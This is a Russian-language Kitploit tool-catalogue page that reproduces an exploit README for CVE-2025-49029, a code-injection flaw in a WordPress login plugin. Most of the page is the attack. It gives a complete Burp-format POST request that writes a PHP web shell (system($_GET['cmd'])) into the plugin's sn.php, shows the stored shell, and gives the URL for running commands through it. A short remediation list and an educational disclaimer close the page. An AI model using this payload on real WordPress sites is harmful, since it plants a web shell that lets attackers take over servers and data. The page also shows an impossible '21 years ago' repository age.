Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-49029 — Плагин WordPress Custom Login And Signup Widget версии <= 1.0 уязвим для произвольного выполнения кода. | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-49029
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-49029

CVE-2025-49029

Плагин WordPress Custom Login And Signup Widget версии <= 1.0 уязвим для произвольного выполнения кода.

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 Плагин WordPress Custom Login And Signup Widget <= 1.0 - Произвольное выполнение кода (RCE)

🐞 Сводка уязвимости

Некорректный контроль генерации кода ('Code Injection') уязвимость в плагине bitto.Kazi Custom Login And Signup Widget позволяет авторизованным пользователям с правами администратора выполнять произвольный PHP-код.
Эта проблема затрагивает все версии до 1.0 включительно.

🔥 Базовая оценка: 9.1 (КРИТИЧЕСКИЙ)
CWE ID: CWE-94 – Некорректный контроль генерации кода ('Code Injection')


🧠 Описание

Плагин позволяет администраторам изменять содержимое файла sn.php через поле Имя отправителя на странице настроек.
Вводимые пользователем данные записываются напрямую в PHP-файл без санитизации или проверки.

В результате любой PHP-код, переданный в параметре text, будет сохранён в PHP-файле и выполнен при прямом запросе, что приводит к удалённому выполнению кода (RCE).


📍 Уязвимая конечная точка

root@kitploit:~
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes

📥 Запрос (формат Burp Suite)

root@kitploit:~
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i

text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

💉 Точка внедрения

  • Параметр: text
  • Тип: POST
  • Требуемая роль: Администратор
  • Затронутый файл: sn.php (конфигурация плагина)

🧬 Внедрённое содержимое, сохранённое в файле

root@kitploit:~
<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>

📁 Файл записывается в:

root@kitploit:~
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php

После успешного внедрения получите к нему прямой доступ для выполнения команд через:

root@kitploit:~
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id

🛡️ Рекомендации

  • Ограничьте операции записи в файлы.
  • Санитарно обрабатывайте и проверяйте все вводимые данные перед записью в PHP-файлы.
  • Никогда не допускайте запись динамического содержимого в файлы .php.

⚠️ Отказ от ответственности

Этот проект создан исключительно в образовательных и исследовательских целях.
Любое использование предоставленной информации осуществляется на ваш собственный риск.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим контентом.


✍️ Автор: Khaled_Alenazi (Nxploited)

Скачать инструмент